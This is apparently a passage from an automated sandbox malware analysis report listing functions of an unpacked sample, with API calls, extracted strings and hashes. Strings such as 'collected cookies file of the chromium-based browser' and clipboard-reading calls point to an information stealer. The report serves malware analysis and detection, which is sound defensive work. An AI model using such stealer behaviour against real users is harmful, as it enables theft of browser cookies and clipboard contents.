Instruction Fuzzy Hash: D65159B41007019FD724CF16C894B52BBB1FF85710F158A9CE8AA4FBA6D774E846CB85

Uniqueness

Uniqueness Score: -1.00%

Function 00409240 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32 ref: 004092BA

Strings

often in other is that on their similarity resemblance system or of on replacements the reflection used ways or it internet. uses play of spellings primarily eleet leetspeak, the character via modified a glyphs, xrefs: 0040927D

Memory Dump Source

Source File: 00000015.00000002.2512424897.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd

Similarity

API ID: ExitProcess
String ID: often in other is that on their similarity resemblance system or of on replacements the reflection used ways or it internet. uses play of spellings primarily eleet leetspeak, the character via modified a glyphs
API String ID: 621844428-3137510881
Opcode ID: 59d31c83763740c401a164c8abda1a317b471818f0df02a94b0c3ec7177b1887
Instruction ID: d46854307137c8737da70bb0dadd48020878a784c1cb78799af495398ee7fa65
Opcode Fuzzy Hash: 59d31c83763740c401a164c8abda1a317b471818f0df02a94b0c3ec7177b1887
Instruction Fuzzy Hash: 64F06871418200B7DA003B765A0765A7AA85F51314F11497FEDC1621C3EA7D4C46C66F

Uniqueness

Uniqueness Score: -1.00%

Function 0043890C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 65
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(?,00000000,FFFFFFFF), ref: 0043894D

Strings

&QPS, xrefs: 00438940
+D, xrefs: 00438958

Memory Dump Source

Source File: 00000015.00000002.2512424897.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd

Similarity

API ID: AllocateHeap
String ID: &QPS$+D
API String ID: 1279760036-1945338363
Opcode ID: 4beedeeb1eead17a5dd0b1e4905107052a67115c677b55d8446cafb403933ed1
Instruction ID: 459049e7f1910dfcb695529ac4e7c087eddce05ed813d227b7292beb86339d8b
Opcode Fuzzy Hash: 4beedeeb1eead17a5dd0b1e4905107052a67115c677b55d8446cafb403933ed1
Instruction Fuzzy Hash: 8C210CB4608340AFD748CF14D8A072BB7A2FB85324F649A2DE96647691CB399851CB86

Uniqueness

Uniqueness Score: -1.00%

Function 00418640 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 0041867A
RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,?,?), ref: 004186A8

Strings

YA, xrefs: 004186C8

Memory Dump Source

Source File: 00000015.00000002.2512424897.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: YA
API String ID: 237503144-686710269
Opcode ID: d21432d5535cc7bef032944450e636dd637eabeb333d1e5c52e84b1f848f86e1
Instruction ID: a0e77e6b5364afb90d31a3fa764f9ee87f1d7ec252d7ac19c8f4855db4dbfd3f
Opcode Fuzzy Hash: d21432d5535cc7bef032944450e636dd637eabeb333d1e5c52e84b1f848f86e1
Instruction Fuzzy Hash: 2D012E35840A04BBD200AB248C86FA7336CEB86724F05421DFA65C72C1DB70B804C6FA

Uniqueness

Uniqueness Score: -1.00%

Function 004340A8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 26COMMON

Download Yara Rule

APIs

GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 004340E2

Strings

\, xrefs: 004340B0
C, xrefs: 004340A8

Memory Dump Source

Source File: 00000015.00000002.2512424897.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd

Similarity

API ID: InformationVolume
String ID: C$\
API String ID: 2039140958-514332402
Opcode ID: 1f089596534fe024055dce1adbee186e85238b9520941c24a8e10a22622ed5ef
Instruction ID: 0b16e51853d0470085fd2b4e6c78b332ddd4def9cb37a61542a3d6919008bdae
Opcode Fuzzy Hash: 1f089596534fe024055dce1adbee186e85238b9520941c24a8e10a22622ed5ef
Instruction Fuzzy Hash: DFE09275350741BBE728DF10EC27F1A3690D742744F10042CB242E91D0C7F57D108A5D

Uniqueness

Uniqueness Score: -1.00%

Function 004261A1 Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 440COMMON

Download Yara Rule

Strings

!/$*, xrefs: 004269FC

Memory Dump Source

Source File: 00000015.00000002.2512424897.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: !/$*
API String ID: 0-545799914
Opcode ID: ba954ffb2ea977e785fb344dc988f3a74d89b07fdf3ede9a299b4b895ee98fb9
Instruction ID: b2e27cbc9dde12e33a9927742966e6e389a792aa4b3f0ff258c4c825271f69ae
Opcode Fuzzy Hash: ba954ffb2ea977e785fb344dc988f3a74d89b07fdf3ede9a299b4b895ee98fb9
Instruction Fuzzy Hash: C4F13870205B918EE7268F35D4A47E3BBE1BF17304F84499DD4EB8B282C77AA405CB55

Uniqueness

Uniqueness Score: -1.00%

Function 004265CC Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 373COMMON

Download Yara Rule

APIs

GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 004266FC

Strings

!/$*, xrefs: 004269FC

Memory Dump Source

Source File: 00000015.00000002.2512424897.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd

Similarity

API ID: InstalledMemoryPhysicallySystem
String ID: !/$*
API String ID: 3960555810-545799914
Opcode ID: e16e771a1d8e5cca60c9eee4cf03313e5d8a22d2944b828cb098f366c51c4bae
Instruction ID: 466006afd69678fcb0a440aae3b801bbbbe4bedcac6f7be2defe912c2a8870dc
Opcode Fuzzy Hash: e16e771a1d8e5cca60c9eee4cf03313e5d8a22d2944b828cb098f366c51c4bae
Instruction Fuzzy Hash: 1DD137B0205B918EE7258F35D4A47E3BBE1BF17304F84496DD4EB8B282C77AA405CB55

Uniqueness

Uniqueness Score: -1.00%

Function 004383AD Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 76libraryCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNELBASE ref: 004384B5

Strings

D1B7, xrefs: 00438412

Memory Dump Source

Source File: 00000015.00000002.2512424897.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd

Similarity

API ID: LibraryLoad
String ID: D1B7
API String ID: 1029625771-1785272153
Opcode ID: ba243289e261731e0f328ab571701020da0383182d802b1ebf38187e4b27abb8
Instruction ID: bda3516896a5f2ae45156be42eb04b2df876cef8185d1ab8fdc58d2902e9d8c2
Opcode Fuzzy Hash: ba243289e261731e0f328ab571701020da0383182d802b1ebf38187e4b27abb8
Instruction Fuzzy Hash: 722171B4518301ABD708DF10D9A171FBBE2FBCA708F14992CE48547351E7748D05DB8A

Uniqueness

Uniqueness Score: -1.00%

Function 004359F0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000,00409E11), ref: 00435A87

Strings

&QPS, xrefs: 00435A48

Memory Dump Source

Source File: 00000015.00000002.2512424897.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd

Similarity

API ID: AllocateHeap
String ID: &QPS
API String ID: 1279760036-2176464483
Opcode ID: 69127a2621d4f876e4ea6e0d4522e800ef0ce33a1218fea6c99b8e6b414e8f95
Instruction ID: 3531a23c288a52d53f944b2c3e457840114f3fd3f8c40cca6c01df16574b446f
Opcode Fuzzy Hash: 69127a2621d4f876e4ea6e0d4522e800ef0ce33a1218fea6c99b8e6b414e8f95
Instruction Fuzzy Hash: B9114570108341AFD708CF04D8A0B6FBBE2FB85328F248A1DE8A507681C739D9199BC6

Uniqueness

Uniqueness Score: -1.00%

Function 0041DE10 Relevance: 3.2, APIs: 2, Instructions: 187COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 0041DEFD
RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,?,?), ref: 0041DF28

Memory Dump Source

Source File: 00000015.00000002.2512424897.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID:
API String ID: 237503144-0
Opcode ID: 8cfea43384b1874fb191508bb5d4e4663a0d06754055d2a61e74e99375003f12
Instruction ID: 62b98572a374dd0777d2ae43eceb347200aff2236fcb4eff31c058ef3ce9dbd0
Opcode Fuzzy Hash: 8cfea43384b1874fb191508bb5d4e4663a0d06754055d2a61e74e99375003f12
Instruction Fuzzy Hash: 29619CB46083518BE324CF15C891BABB7E1FFCA318F014A1DE8D65B281D3B89945CB97

Uniqueness

Uniqueness Score: -1.00%

Function 004154A0 Relevance: 3.2, APIs: 2, Instructions: 162COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 004154DD
RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,?,?), ref: 0041550E

Memory Dump Source

Source File: 00000015.00000002.2512424897.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID:
API String ID: 237503144-0
Opcode ID: 6b3f1f4b648c2d8264f9fb9466e5d9c9fe5605113bbe2bb8b5d1263e72349528
Instruction ID: fc12c6e93429097c05e90d0d9db2d7eb9be4e75d929ef6e862d3717b1209126b
Opcode Fuzzy Hash: 6b3f1f4b648c2d8264f9fb9466e5d9c9fe5605113bbe2bb8b5d1263e72349528
Instruction Fuzzy Hash: 94519F74204750EFD3208F18C891BABB7E5EFC6724F404A1DF9998B391DB749845CB96

Uniqueness

Uniqueness Score: -1.00%

Function 0042E6AB Relevance: 3.1, APIs: 2, Instructions: 63COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL ref: 0042E6C5
GetSystemMetrics.USER32 ref: 0042E6D5

Memory Dump Source

Source File: 00000015.00000002.2512424897.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd

Similarity

API ID: CallbackDispatcherMetricsSystemUser
String ID:
API String ID: 365337688-0
Opcode ID: c25e3d91eaef95e72eee0b40d5d97d098b1fba32fea2081f15efa1ce194b10f2
Instruction ID: c70253705267066fe0a390eb40da1e2c454f4fe67f9f49903ef1b4541bef4a9f
Opcode Fuzzy Hash: c25e3d91eaef95e72eee0b40d5d97d098b1fba32fea2081f15efa1ce194b10f2
Instruction Fuzzy Hash: 5F319BB46197408FD750EF39D985A1ABBF0BB89304F40892EE998C73A0E731A945CF46

Uniqueness

Uniqueness Score: -1.00%

Function 00438312 Relevance: 1.5, APIs: 1, Instructions: 36libraryCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNELBASE ref: 00438356

Memory Dump Source

Source File: 00000015.00000002.2512424897.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 2ec94da7954408cfae29368b1fe2093eb4b36237cb70dc7a0dbd9c2afcbb8aec
Instruction ID: 1610e8cb5096fc1eed96c977c505dcc91df5b75474227e367c2d36b4526b057e
Opcode Fuzzy Hash: 2ec94da7954408cfae29368b1fe2093eb4b36237cb70dc7a0dbd9c2afcbb8aec
Instruction Fuzzy Hash: 00F0A574209340ABD708DB14D69099FFBE2AFCAA49F24881DE48583306C734EC43AE4A

Uniqueness

Uniqueness Score: -1.00%

Function 0043914C Relevance: 1.5, APIs: 1, Instructions: 34memoryCOMMON

Download Yara Rule

APIs

RtlReAllocateHeap.NTDLL(00000000,00000000), ref: 004391B5

Memory Dump Source

Source File: 00000015.00000002.2512424897.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 59dc1c7f1cc53553e71521ab8106514bee450ab26b812539456e6df4fe94b9da
Instruction ID: da42185ebec8373d7b22ee920953178115992f0127cd58568fcf92c2ed0c5c99
Opcode Fuzzy Hash: 59dc1c7f1cc53553e71521ab8106514bee450ab26b812539456e6df4fe94b9da
Instruction Fuzzy Hash: 7B01D274508341AFE710CF14D88475BFBB2EBC6324F209E49E8A417695C3B5ED4A9B8A

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0042DDE0 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 153clipboardCOMMON

Download Yara Rule

APIs

GetWindowInfo.USER32 ref: 0042DE34
OpenClipboard.USER32 ref: 0042DE46
GetClipboardData.USER32 ref: 0042DE6B
GlobalLock.KERNEL32 ref: 0042DE8C
GlobalUnlock.KERNEL32 ref: 0042DF8B
CloseClipboard.USER32 ref: 0042DF91

Strings

I, xrefs: 0042DEE9
7, xrefs: 0042DEE5
8, xrefs: 0042DEED
L, xrefs: 0042DEFD
N, xrefs: 0042DEF5
K, xrefs: 0042DEF9

Memory Dump Source

Source File: 00000015.00000002.2512424897.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd

Similarity

API ID: Clipboard$Global$CloseDataInfoLockOpenUnlockWindow
String ID: 7$8$I$K$L$N
API String ID: 3829817484-2422513041
Opcode ID: 6bd769e2c866ad362b282a4a0c33327f7ba68ca5a8274088656c9bed962daec9
Instruction ID: 8ed9dd40b2239205a4d96c9da8700085f56f38dffb9234c430860a7af855d13a
Opcode Fuzzy Hash: 6bd769e2c866ad362b282a4a0c33327f7ba68ca5a8274088656c9bed962daec9
Instruction Fuzzy Hash: 0F5190B0A04740CFC721DF39D585616BBE0AF16314F548AADE8D68F796D334E805CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 0041EF19 Relevance: 15.5, Strings: 12, Instructions: 473COMMON

Download Yara Rule

Strings

Ny0{, xrefs: 0041FA27
GC, xrefs: 0041F92D
x!\', xrefs: 0041F066
)/, xrefs: 0041F30E
bD, xrefs: 0041F90F
H{, xrefs: 0041F923
.q#s, xrefs: 0041FA3B
4i:k, xrefs: 0041FA4F
[J, xrefs: 0041F919
"u w, xrefs: 0041FA45
)m:o, xrefs: 0041FA59
8a)c, xrefs: 0041FA63

Memory Dump Source

Source File: 00000015.00000002.2512424897.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: "u w$)m:o$.q#s$4i:k$8a)c$GC$H{$Ny0{$[J$bD$x!\'$)/
API String ID: 0-3498391054
Opcode ID: 15b7895d50192fbd9e2686c79026486b2693e9a6a391717bdcf467abc5fd23ba
Instruction ID: 62964ce6587a9f6e8b4bc72a90dd2b3cf09b0a553c01e9630c29236c2bf44c9c
Opcode Fuzzy Hash: 15b7895d50192fbd9e2686c79026486b2693e9a6a391717bdcf467abc5fd23ba
Instruction Fuzzy Hash: D852FCB0205B858FE325CF25D494BD7BBE1BB06348F50892EC4EB5B645CB74A14ACF92

Uniqueness

Uniqueness Score: -1.00%

Function 0041FBB5 Relevance: 15.5, Strings: 12, Instructions: 465COMMON

Download Yara Rule

Strings

x!\', xrefs: 0041FD02
.q#s, xrefs: 004206C7
)/, xrefs: 0041FFA0
GC, xrefs: 004205B9
H{, xrefs: 004205AF
"u w, xrefs: 004206D1
4i:k, xrefs: 004206DB
8a)c, xrefs: 004206EF
Ny0{, xrefs: 004206B3
bD, xrefs: 0042059B
)m:o, xrefs: 004206E5
[J, xrefs: 004205A5

Memory Dump Source

Source File: 00000015.00000002.2512424897.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: "u w$)m:o$.q#s$4i:k$8a)c$GC$H{$Ny0{$[J$bD$x!\'$)/
API String ID: 0-3498391054
Opcode ID: 17e1eef2c47546f5909f2ab459ea3df871a253adbcce23567c6d7a1e809ea18b
Instruction ID: 047a6880c081cc5f665bfd31f87bed186ae8e6b2cdbb109c5f5ad8525fb29fbb
Opcode Fuzzy Hash: 17e1eef2c47546f5909f2ab459ea3df871a253adbcce23567c6d7a1e809ea18b
Instruction Fuzzy Hash: 6F52FBB0205B858FE325CF25D494BD7BBE1BB06348F90891EC4EB5B646CB74A149CF92

Uniqueness

Uniqueness Score: -1.00%

Function 0040F7CD Relevance: 13.8, Strings: 11, Instructions: 100COMMON

Download Yara Rule

Strings

M-q/, xrefs: 0040F7EA
3yZ{, xrefs: 0040F860
Hik, xrefs: 0040F88C
:m:o, xrefs: 0040F897
u!|#, xrefs: 0040F7F2
8MnO, xrefs: 0040F83F
hI4K, xrefs: 0040F834
q$s, xrefs: 0040F876
u=w, xrefs: 0040F881
9aBc, xrefs: 0040F8A2
~w, xrefs: 0040F9F7

Memory Dump Source

Source File: 00000015.00000002.2512424897.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: u=w$3yZ{$8MnO$9aBc$:m:o$Hik$M-q/$hI4K$u!|#$~w$q$s
API String ID: 0-1478902827
Opcode ID: 7fc9041370a3a3983846bac274a0ed910bcf7d3cbc2af6b240ce81c8c7474168
Instruction ID: a799ed0fff6447343bd514cbacf28bedb163b3e05e2a36f77cc3edbc9f46f7b9
Opcode Fuzzy Hash: 7fc9041370a3a3983846bac274a0ed910bcf7d3cbc2af6b240ce81c8c7474168
Instruction Fuzzy Hash: AA51EBB45193C19BE674CF11D891B9FBBA1BBC6340F608E1CD5D92B254CB30904ACF96

Uniqueness

Uniqueness Score: -1.00%

Function 00424240 Relevance: 9.0, Strings: 7, Instructions: 223COMMON

Download Yara Rule

Strings

##*8, xrefs: 00424317
&>95, xrefs: 0042432B
rr}t, xrefs: 00424411
)5>Q, xrefs: 0042426B
7&"4, xrefs: 00424321
8C, xrefs: 00424308
4f, xrefs: 004243DF

Memory Dump Source

Source File: 00000015.00000002.2512424897.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd

Similarity

API ID: AllocateHeap
String ID: ##*8$&>95$)5>Q$7&"4$8C$rr}t$4f
API String ID: 1279760036-3888404133
Opcode ID: e00ea2bdaeffd0a9729e623cd7ec9ac439a47e1c81a22ef65f6c947e8406e17f
Instruction ID: 3f6742af25c925c888f3af746ffa36932763abd1f696094f3cdaf422b2e53c93
Opcode Fuzzy Hash: e00ea2bdaeffd0a9729e623cd7ec9ac439a47e1c81a22ef65f6c947e8406e17f
Instruction Fuzzy Hash: 4D9157B4245B90CBE3268F25D4A0BE3BBE1FF56309F540A5DC4EB0B285C37AA4458F95

Uniqueness

Uniqueness Score: -1.00%

Function 0041D128 Relevance: 8.0, Strings: 6, Instructions: 493COMMON

Download Yara Rule

Strings

#m8j, xrefs: 0041D29D
deks, xrefs: 0041D2B3
[info] collected cookies file of the chromium-based browser[info] collected cookies file of the chromium-based browser, xrefs: 0041D348
"frc, xrefs: 0041D287
=ksw, xrefs: 0041D27C
&zqi, xrefs: 0041D292

Memory Dump Source

Source File: 00000015.00000002.2512424897.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: "frc$#m8j$&zqi$=ksw$[info] collected cookies file of the chromium-based browser[info] collected cookies file of the chromium-based browser$deks
API String ID: 0-866983173
Opcode ID: 24fb457cb41431979cf467ed9e60fa379f1c1d026843b3a604b61835dc222ffe
Instruction ID: c58cb54646a3eb14b49da7c51523dbab074ab8a0297049e6d9acae5f9d3fd762
Opcode Fuzzy Hash: 24fb457cb41431979cf467ed9e60fa379f1c1d026843b3a604b61835dc222ffe
Instruction Fuzzy Hash: B2029FB59083559FC324CF18C49076BBBE2BF86308F588A6DE4D59B391D738E841CB96

Uniqueness

Uniqueness Score: -1.00%

Function 0043B470 Relevance: 4.1, Strings: 3, Instructions: 313COMMON

Download Yara Rule

Strings

gxyz, xrefs: 0043B4D8
R-,T, xrefs: 0043B620
R-,T, xrefs: 0043B520

Memory Dump Source

Source File: 00000015.00000002.2512424897.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: R-,T$R-,T$gxyz
API String ID: 0-1473045628
Opcode ID: ddd268ac6d2f33a470f6913d82c9eb196eaea442fb098731b87c3d576cbaa607
Instruction ID: d43682651e4d1bbcca935c21765318abaecc161b347944d4f0b38a11893cb63e
Opcode Fuzzy Hash: ddd268ac6d2f33a470f6913d82c9eb196eaea442fb098731b87c3d576cbaa607
Instruction Fuzzy Hash: 77A1BC726043129BC715CF18C49076BB7A2FF88324F29961EE9959B391D738EC15CBCA

Uniqueness

Uniqueness Score: -1.00%

Function 00416E69 Relevance: 4.0, Strings: 3, Instructions: 266COMMON

Download Yara Rule

Strings

/9++, xrefs: 004170E7
756., xrefs: 004170E0
w[info] collected cookies file of the chromium-based browser[info] collected cookies file of the chromium-based browser, xrefs: 00417199

Memory Dump Source

Source File: 00000015.00000002.2512424897.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: /9++$756.$w[info] collected cookies file of the chromium-based browser[info] collected cookies file of the chromium-based browser
API String ID: 0-1700640428
Opcode ID: a014cfe3effdd53ad0569a5c0da46c576056ff92ac18762d3f8e3a7eb364fc7e
Instruction ID: cbd01cd0f0e0f6a1cd8aef29ed4a15310b76b2b422a9a27135592bbd613474a8
Opcode Fuzzy Hash: a014cfe3effdd53ad0569a5c0da46c576056ff92ac18762d3f8e3a7eb364fc7e
Instruction Fuzzy Hash: CAB1A070508B418BD329CF35C0A17A3BBE2BF96354F148A5EC0E74B791C739A486CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00411739 Relevance: 3.5, APIs: 2, Instructions: 509COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000000,00000000,00000000,?), ref: 00411C9F
RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000000,?,?,?), ref: 00411CD0

Memory Dump Source

Source File: 00000015.00000002.2512424897.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID:
API String ID: 237503144-0
Opcode ID: 068fec51292eb0153f786f845102b85ca71fb8b30bd3bb33e2b1e054605888a3
Instruction ID: 0ed494a6543ca339513086986a4129f0b880fa6df34ef5ec732637b97b238257
Opcode Fuzzy Hash: 068fec51292eb0153f786f845102b85ca71fb8b30bd3bb33e2b1e054605888a3
Instruction Fuzzy Hash: BD127D71250B008BE325CF24C4917E7B7F2BF85304F088A2DD4AB87691EB7AB559CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0041B930 Relevance: 1.6, Strings: 1, Instructions: 325COMMON

Download Yara Rule

Strings

789:, xrefs: 0041BBB6

Memory Dump Source

Source File: 00000015.00000002.2512424897.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: 789:
API String ID: 0-2924019492
Opcode ID: e0f3f7d0596bfe4dc5ff72c477c81c12b67577cc1637fc02188e642f6b18ddda
Instruction ID: 418ff68b172b6724851a5f9b45def2009d2e8c16223b2686ec42ef28e0ca92a7
Opcode Fuzzy Hash: e0f3f7d0596bfe4dc5ff72c477c81c12b67577cc1637fc02188e642f6b18ddda
Instruction Fuzzy Hash: F981D1B1A042059BDB24DF14C892BBB73B4EF85324F08452DE9959B391E738ED41C7EA

Uniqueness

Uniqueness Score: -1.00%

Function 0041B2A0 Relevance: 1.6, Strings: 1, Instructions: 312COMMON

Download Yara Rule

Strings

?mlk, xrefs: 0041B3D6

Memory Dump Source

Source File: 00000015.00000002.2512424897.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: ?mlk
API String ID: 0-3660313571
Opcode ID: 97b274258cad0d2a8105dcc4bee178d9e6acf215cafa78d55b1c740ac654e8c4
Instruction ID: 01c671782572adc667358f00788eb460e8e2c42b2d22e52cc5728f6b1ee1f78b
Opcode Fuzzy Hash: 97b274258cad0d2a8105dcc4bee178d9e6acf215cafa78d55b1c740ac654e8c4
Instruction Fuzzy Hash: 8D8105B15042148BDB14DF18C892BBB73B2EF95328F18825EE8964B391E739D845C7E6

Uniqueness

Uniqueness Score: -1.00%

Function 00410C5B Relevance: 1.5, Strings: 1, Instructions: 234COMMON

Download Yara Rule

Strings

JAF, xrefs: 0041237A

Memory Dump Source

Source File: 00000015.00000002.2512424897.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: JAF
API String ID: 0-4103162853
Opcode ID: 1bc51c8d7137a81186cf93fce71378e3e53ede87a7d22c3f08a3ef397aca0887
Instruction ID: cfe4e2a8978f3ae7d713284cd87d2e3eb9195a7231fafb701f6cf529d3db3fb2
Opcode Fuzzy Hash: 1bc51c8d7137a81186cf93fce71378e3e53ede87a7d22c3f08a3ef397aca0887
Instruction Fuzzy Hash: 37816DB0500B009FE735CF24C490BA7B7F6BF45314F148A2ED4AA87681E779B998CB94

Uniqueness

Uniqueness Score: -1.00%

Function 004176E1 Relevance: 1.4, Strings: 1, Instructions: 103COMMON

Download Yara Rule

Strings

789:, xrefs: 0041772A

Memory Dump Source

Source File: 00000015.00000002.2512424897.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: 789:
API String ID: 0-2924019492
Opcode ID: 84606cd881d82e9bb318d4f0a26b9851e8aa3b96b1d02f44d570d103868ee779
Instruction ID: 7b78dbaa38c7b21beee6cf440ef457b437b28244ea0c7ae6acfcb896623c88e2
Opcode Fuzzy Hash: 84606cd881d82e9bb318d4f0a26b9851e8aa3b96b1d02f44d570d103868ee779
Instruction Fuzzy Hash: A631D079A04A408FD325CF24C895BA7B7F2EB46304F58896ED497C7792DB38E846CB44

Uniqueness

Uniqueness Score: -1.00%

Function 00417A78 Relevance: 1.3, Strings: 1, Instructions: 95COMMON

Download Yara Rule

Strings

[info] collected cookies file of the chromium-based browser[info] collected cookies file of the chromium-based browser, xrefs: 00417B23

Memory Dump Source

Source File: 00000015.00000002.2512424897.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: [info] collected cookies file of the chromium-based browser[info] collected cookies file of the chromium-based browser
API String ID: 0-4202348984
Opcode ID: e6945d7441c4ca921465b1a41f44629304a2dc6011dd70954a208598614fb8d4
Instruction ID: 7b1c09e42af0d5f6b04bbe538d6475b2e989d68743133b3e170275eba0625d42
Opcode Fuzzy Hash: e6945d7441c4ca921465b1a41f44629304a2dc6011dd70954a208598614fb8d4
Instruction Fuzzy Hash: 39217CB4918B918FC3368F34C5A4363BBF1AB12218B041A5DC5E38BB91C374F442CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00413722 Relevance: 1.3, Strings: 1, Instructions: 77COMMON

Download Yara Rule

Strings

789:, xrefs: 0041374F

